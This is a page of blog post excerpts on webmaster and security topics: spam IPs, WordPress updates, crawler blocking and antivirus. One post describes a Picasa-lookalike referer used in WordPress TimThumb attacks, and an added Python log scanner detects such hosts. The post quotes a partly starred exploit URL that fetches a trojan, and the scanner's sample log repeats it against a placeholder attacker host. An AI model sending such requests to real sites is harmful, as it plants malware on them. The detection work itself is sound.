MWEB IPs used by Spammers and Hackers
Checking an IP record for 188.8.131.52 after noticing a minor offence this morning – the ubiquitous and quite stupid practice of adding “/undefined” to the end of actual URLs – brought up a list of IPs in the neighbourhood. All the IPs included below belong to MWEB. (whois.domaintools.com IP lookup records.)
MWEB, a South African Internet Service Provider, has previously had IPs under their control listed in several databases as a source of spam e-mails. According to Project Honeypot, a range of IPs managed by MWEB is (or was) used by Spammers and Dictionary Attackers.
False Valuation by Pansee.com
Ever had a site valuation by pansee.com? I got sent a mail informing me ‘someone’ had conducted a valuation of my website graphicline.co.za using pansee.com valuation tools, with a link to the valuation report. Interested to see what the report contained, I checked if Google had any information about malware on the site, then visited the page.
The valuation report had some interesting data, from the country where most of the website traffic comes from to the number of daily visitors, and a claim about the value of advertising on the front page.
France is the Biggest Source of Traffic
This amused me… According to pansee.com, 12.2 percent of my traffic comes from France, while the USA only accounts for 8.1%.
Update to WordPress 3.4
WordPress 3.4 was released to the public a few days ago. WP 3.4 has been in Beta testing for quite some time, so most bugs should have been discovered and fixed by now – and so they are. The list of known issues is short (Troubleshooting WordPress 3.4 – Master List). More issues have been reported with the latest default theme (TwentyEleven) version, and with the JetPack version update released at the same time than with WP 3.4 core.
Should we update our WordPress installations? Generally the answer is yes. It is always a good idea to keep WordPress up to date; however, the update should be approached with a degree of caution. Some plugins may not work with the latest version of WP, and some themes may also have problems. So before updating, let’s consider a few things in case the update causes problems or, even worse, a broken site.
What is Markmonitor.com?
Markmonitor.com is a company providing brand protection to (mainly) global brands.
Markmonitor monitors the Internet (supposedly) looking for brand-piracy, domain name hijacking and counterfeiting (of branded goods) among its range of client services. The company must use search spiders to trawl websites looking for this information.
They also have another side of business, as a domain registrar, and a number of large corporations, including Apple.com, have their domains under their ambit.
Baidu and Yandex Bots Forbidden Access
That’s it folk, I have denied access to the Baidu and Yandex web spiders. I don’t want them crawling my sites, I don’t want them crawling my clients’ sites (unless the client wants them to of course). Both these bots do not follow advanced robots.txt disallow rules, and crawl areas of the sites I don’t want indexed… In particular I don’t want them continually searching my sites for non-existent RSS feeds and /trackback urls thus generating excessive page not found errors.
I am becoming stricter with web bots that do not comply with the more advanced robots.txt rules, e.g. “disallow /feed” and wildcards. Google obeys these rules, Bing obeys these rules, any other worthwhile search engine should also obey these rules.
Microsoft Security Essentials Under Microscope
A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?
Over the next few months we will see.
Annoyed with Commercial AV Software.
I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too many system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
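One way to spot the lookalike hostnames described above in an access log, as an added example that is not part of the original post. It assumes Apache/Nginx combined log format; the allowlist, the sample log lines, the IPs and the `attacker.example` / `site.example` domains are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed allowlist of domains a thumbnail script may fetch from.
TRUSTED = ("picasa.com", "google.com", "flickr.com")

# Combined log format: request target and referer are the two captured groups.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" \d{3} \S+ "([^"]*)"')

# Constructed sample lines (documentation IP ranges, placeholder domains).
SAMPLE_LOG = r'''
203.0.113.7 - - [12/Jun/2012:06:14:02 +0200] "GET /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.attacker.example/2.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Jun/2012:06:15:40 +0200] "GET /wp-content/themes/biznizz/thumb.php?src=http://picasa.google.com/photo.jpg&w=150 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jun/2012:06:17:11 +0200] "GET /index.php HTTP/1.1" 200 4096 "http://site.example/thumb.php?src=http://picasa.com.attacker.example/2.php" "Mozilla/5.0"
'''.strip().splitlines()

def is_lookalike(host):
    """True if a trusted name appears in host, but host is not that domain or a subdomain of it."""
    host = host.lower().rstrip(".")
    if any(host == d or host.endswith("." + d) for d in TRUSTED):
        return False
    return any(d in host for d in TRUSTED)

def remote_urls(field):
    """Yield http(s) URLs passed as query-parameter values in a request target or referer."""
    for _, value in parse_qsl(urlsplit(field).query):
        if value.lower().startswith(("http://", "https://")):
            yield value

def scan(lines):
    """Return (client_ip, spoofed_host) for every log line that carries a lookalike host."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        for field in match.groups():
            for url in remote_urls(field):
                host = urlsplit(url).hostname or ""
                if is_lookalike(host):
                    hits.append((client_ip, host))
    return hits

if __name__ == "__main__":
    for client_ip, host in scan(SAMPLE_LOG):
        print(f"{client_ip} requested a fetch from lookalike host {host}")
```

The check compares the parsed hostname against the allowlist by exact match or dot-suffix, so a trusted name used only as a leading label is flagged while real subdomains such as picasa.google.com pass.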
Data Bundle Overload: End to Free Mobile Data
It looks like mobile data users at the Southern tip of Africa are not the only ones looking at paying high prices for data bundles (or buckets as they are known in some locales). The USA is joining the trend of charging for mobile data. Down South we have never known the privilege of free mobile data, having some of the highest data costs per GB in the world – at least when compared to first world civilisation.
The Data Crunch
The end of free mobile data is no real surprise. The RF frequencies used to carry this traffic are limited in capacity, and new compression technology can only go so far to reduce the load on these channels. Arguably more frequencies could be made available; however, these would have to be in higher frequency bands than are currently used. Increasing RF frequency brings its own problems – higher frequencies (into the mid and high GHz region) suffer more loss from inclement weather and signal absorption from structures, components cost more, and we have to consider the human health related dangers of microwave radiation.